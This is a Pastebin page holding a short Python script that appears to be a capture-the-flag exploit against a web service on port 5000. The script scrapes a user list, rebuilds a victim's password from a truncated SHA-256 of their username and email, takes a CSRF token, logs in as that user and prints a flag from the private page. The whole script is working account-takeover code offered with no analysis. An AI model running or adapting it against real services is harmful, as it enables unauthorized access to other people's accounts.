Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3
- import sys
- import requests
- from hashlib import sha256
- from binascii import hexlify
- from bs4 import BeautifulSoup
- HOST = sys.argv[1]
- PORT = 5000
- def get_password(username, email):
- m = sha256()
- m.update(username.encode('utf-8'))
- m.update(email.encode('utf-8'))
- res = m.digest()[:10]
- return hexlify(res).decode('utf-8')
- def get_users():
- global HOST, PORT
- res = requests.get('http://{}:{}/users'.format(HOST, PORT))
- users_ = res.text
- soup = BeautifulSoup(users_, 'lxml')
- i = soup.findAll('td', {'class':'pwnCompany', 'style':True})[-1]
- d_ = i.string.split()
- s = requests.session()
- username = d_[1]
- email = d_[2][1:-1]
- password = get_password(username, email)
- res = s.get('http://{}:{}/login'.format(HOST, PORT)).text
- soup = BeautifulSoup(res, 'lxml')
- csrf = soup.findAll('input', {'id':'csrf_token'})[0]['value']
- res = s.post('http://{}:{}/login'.format(HOST, PORT), data={'csrf_token':csrf,
- 'username':username,
- 'password':password,
- 'submit':'Sign+In'})
- res = s.get('http://{}:{}/private'.format(HOST, PORT)).text
- soup = BeautifulSoup(res, 'lxml')
- flag = soup.findAll('div', {'class':'TD', 'style':'max-width: 100%; overflow-x: scroll'})[-1].string[1:-1]
- print(flag, flush=True)
- get_users()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
